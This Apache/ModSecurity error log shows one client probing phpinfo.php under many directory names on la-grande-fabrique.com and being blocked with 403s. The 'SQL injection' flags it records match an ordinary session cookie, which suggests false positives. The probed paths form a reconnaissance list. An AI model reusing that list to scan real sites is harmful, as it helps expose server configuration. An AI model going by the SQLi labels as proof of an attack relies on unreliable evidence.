[Mon May 11 14:10:47.975558 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/beta/phpinfo.php"] [unique_id "agHHR6y-5-wpj6Sx56aBggAAABU"]
[Mon May 11 14:10:48.320903 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/uat/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBhAAAABU"]
[Mon May 11 14:10:48.321097 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/uat/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBhAAAABU"]
[Mon May 11 14:10:48.321362 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/uat/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBhAAAABU"]
[Mon May 11 14:10:48.514094 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/qa/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBiAAAABU"]
[Mon May 11 14:10:48.514307 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/qa/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBiAAAABU"]
[Mon May 11 14:10:48.514580 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/qa/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBiAAAABU"]
[Mon May 11 14:10:48.708023 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/preview/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBiwAAABU"]
[Mon May 11 14:10:48.708245 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/preview/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBiwAAABU"]
[Mon May 11 14:10:48.708497 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/preview/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBiwAAABU"]
[Mon May 11 14:10:48.885946 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/www/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBjAAAABU"]
[Mon May 11 14:10:48.886141 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/www/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBjAAAABU"]
[Mon May 11 14:10:48.886406 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/www/phpinfo.php"] [unique_id "agHHSKy-5-wpj6Sx56aBjAAAABU"]
[Mon May 11 14:10:49.068754 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBjgAAABU"]
[Mon May 11 14:10:49.068964 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBjgAAABU"]
[Mon May 11 14:10:49.069211 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBjgAAABU"]
[Mon May 11 14:10:49.122702 2026] [core:error] [pid 1319998:tid 1320016] [client 52.242.216.199:21757] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:49.122733 2026] [core:error] [pid 1319998:tid 1320016] [client 52.242.216.199:21757] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:49.252632 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/public_html/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBkAAAABU"]
[Mon May 11 14:10:49.252851 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/public_html/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBkAAAABU"]
[Mon May 11 14:10:49.253097 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/public_html/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBkAAAABU"]
[Mon May 11 14:10:49.445410 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/site/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBkQAAABU"]
[Mon May 11 14:10:49.445608 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/site/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBkQAAABU"]
[Mon May 11 14:10:49.445842 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/site/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBkQAAABU"]
[Mon May 11 14:10:49.613622 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/docs/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBkgAAABU"]
[Mon May 11 14:10:49.613818 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/docs/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBkgAAABU"]
[Mon May 11 14:10:49.614031 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/docs/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBkgAAABU"]
[Mon May 11 14:10:49.833029 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-admin/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBlAAAABU"]
[Mon May 11 14:10:49.833236 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-admin/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBlAAAABU"]
[Mon May 11 14:10:49.833485 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-admin/phpinfo.php"] [unique_id "agHHSay-5-wpj6Sx56aBlAAAABU"]
[Mon May 11 14:10:50.026223 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/administrator/phpinfo.php"] [unique_id "agHHSqy-5-wpj6Sx56aBlwAAABU"]
[Mon May 11 14:10:50.026431 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/administrator/phpinfo.php"] [unique_id "agHHSqy-5-wpj6Sx56aBlwAAABU"]
[Mon May 11 14:10:50.026678 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/administrator/phpinfo.php"] [unique_id "agHHSqy-5-wpj6Sx56aBlwAAABU"]
[Mon May 11 14:10:50.256241 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/core/phpinfo.php"] [unique_id "agHHSqy-5-wpj6Sx56aBmQAAABU"]
[Mon May 11 14:10:50.256436 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/core/phpinfo.php"] [unique_id "agHHSqy-5-wpj6Sx56aBmQAAABU"]
[Mon May 11 14:10:50.256667 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/core/phpinfo.php"] [unique_id "agHHSqy-5-wpj6Sx56aBmQAAABU"]
[Mon May 11 14:10:50.430915 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/includes/phpinfo.php"] [unique_id "agHHSqy-5-wpj6Sx56aBmgAAABU"]
[Mon May 11 14:10:50.431119 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/includes/phpinfo.php"] [unique_id "agHHSqy-5-wpj6Sx56aBmgAAABU"]
